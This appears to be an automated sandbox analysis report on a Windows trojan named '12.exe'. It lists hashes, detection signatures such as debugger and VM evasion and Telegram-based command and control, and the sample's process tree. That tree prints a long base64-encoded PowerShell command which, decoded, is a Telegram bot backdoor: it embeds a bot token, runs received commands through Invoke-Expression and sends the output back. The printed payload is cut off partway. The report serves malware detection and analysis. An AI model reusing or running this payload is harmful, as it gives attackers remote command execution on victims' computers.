Edit tour
Windows
Analysis Report
12.exe
Overview
General Information
| Sample name: | 12.exe |
| Analysis ID: | 1590581 |
| MD5: | 90f2ca0a38d6e5416ee2f6be6326521d |
| SHA1: | 00bf14e8153778835f95b9255ae1658e37819f8d |
| SHA256: | 6534d5fd803f9c85bec3a820cef54f953e8643f3a4e16677d11decbf1a5b54c7 |
| Tags: | exemalwaretrojanuser-Joker |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
12.exe (PID: 1892 cmdline: "C:\Users\ user\Deskt op\12.exe" MD5: 90F2CA0A38D6E5416EE2F6BE6326521D) 
powershell.exe (PID: 6496 cmdline: powershell .exe -Comm and "Start -Process ' C:\Users\u ser\AppDat a\Local\Te mp\/file.p df'; power shell.exe -e 'JABUAG 8AawBlAG4A IAA9ACAAIg A3ADUANQA0 ADMAMAA3AD YANgA5ADoA QQBBAEUAXw BsAG4AUQBU AFkAUwBYAH YAdQBzAGEA SwBsAGsAcA BOAHIAdgAy AEQAdgBZAH UAQwA3AEgA aABJADAAcw AwACIADQAK ACQAVQBSAE wAIAA9ACAA IgBoAHQAdA BwAHMAOgAv AC8AYQBwAG kALgB0AGUA bABlAGcAcg BhAG0ALgBv AHIAZwAvAG IAbwB0AHsA MAB9ACIAIA AtAGYAIAAk AFQAbwBrAG UAbgANAAoA JABsAGEAcw B0AEkARAAg AD0AIAAxAD IAMwANAAoA JABzAGwAZQ BlAHAAVABp AG0AZQAgAD 0AIAAyAA0A CgAkAGkAZA BlAG4AdABp AGYAaQBlAH IAIAA9ACAA LQBqAG8AaQ BuACAAKAAo ADQAOAAuAC 4ANQA3ACkA IAB8ACAARw BlAHQALQBS AGEAbgBkAG 8AbQAgAC0A QwBvAHUAbg B0ACAANQAg AHwAIAAlAC AAewBbAGMA aABhAHIAXQ AkAF8AfQAp AA0ACgANAA oAZgB1AG4A YwB0AGkAbw BuACAASQBu AHYAbwBrAG UALQBCAG8A dABDAG0AZA AgAHsADQAK ACAAIAAgAC AAcABhAHIA YQBtACAAKA ANAAoAIAAg ACAAIAAgAC AAIAAgACQA YwBvAG0AbQ BhAG4AZAAN AAoAIAAgAC AAIAApAA0A CgAgACAAIA AgAHQAcgB5 ACAAewANAA oAIAAgACAA IAAgACAAIA AgACQAcgBl AHMAdQBsAH QAIAA9ACAA SQBuAHYAbw BrAGUALQBF AHgAcAByAG UAcwBzAGkA bwBuACgAJA BjAG8AbQBt AGEAbgBkAC kADQAKACAA IAAgACAAfQ ANAAoAIAAg ACAAIABjAG EAdABjAGgA IAB7AA0ACg AgACAAIAAg ACAAIAAgAC AAJAByAGUA cwB1AGwAdA AgAD0AIAAk AEUAcgByAG 8AcgBbADAA XQAuAEUAeA BjAGUAcAB0 AGkAbwBuAA 0ACgAgACAA IAAgAH0ADQ AKACAAIAAg ACAAJAByAG UAcwAgAD0A IAAiAFsAJA BpAGQAZQBu AHQAaQBmAG kAZQByAF0A JQAwAEQAJQ AwAEEAIgAN AAoAIAAgAC AAIAAkAHIA ZQBzAHUAbA B0ACAAfAAg AEYAbwByAE UAYQBjAGgA LQBPAGIAag BlAGMAdAAg AHsAJAByAG UAcwAgACsA PQAgAFsAcw B0AHIAaQBu AGcAXQAkAF 8AIAArACAA IgAlADAARA AlADAAQQAi AH0ADQAKAA 0ACgAgACAA IAAgAGkAZg AoACQAcgBl AHMAIAAtAG UAcQAgACIA IgApAHsADQ AKACAAIAAg ACAAIAAgAC AAIAAkAGwA YQBzAHQASQ BEACAAPQAg ACQAdQBwAG QAYQB0AGUA aQBkAA0ACg AgACAAIAAg ACAAIAAgAC AAYwBvAG4A dABpAG4AdQ BlAA0ACgAg ACAAIAAgAH 0ADQAKACAA IAAgACAAaQ BmACgAJABy AGUAcwAuAE wAZQBuAGcA dABoACAALQ BnAHQAIAA0 ADAAOQA1AC kAewANAAoA IAAgACAAIA AgACAAIAAg AGYAbwByAC AAKAAkAGkA IAA9ACAAMA A7ACAAJABp ACAALQBsAH QAIAAkAHIA ZQBzAC4ATA BlAG4AZwB0 AGgAIAAvAC AANAAwADkA NQA7ACAAJA BpACsAKwAp ACAAewANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAJABiAG UAZwBpAG4A IAA9ACAAJA BpACAAKgAg ADQAMAA5AD UADQAKACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC QAZQBuAGQA IAA9ACAAJA BiAGUAZwBp AG4AIAArAC AANAAwADkA NAANAAoAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA aQBmACgAJA BlAG4AZAAg AC0AZwB0AC AAJAByAGUA cwAuAEwAZQ BuAGcAdABo ACkAewANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAkAGUA bgBkACAAPQ AgACQAcgBl AHMALgBMAG UAbgBnAHQA aAANAAoAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA fQANAAoAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA JABkAGEAdA BhACAAPQAg ACIAYwBoAG EAdABfAGkA ZAA9ACQAZg ByAG8AbQAm AHQAZQB4AH QAPQAiACAA KwAgACQAcg BlAHMAWwAk AGIAZQBnAG kAbgAuAC4A JABlAG4AZA BdAA0ACgAg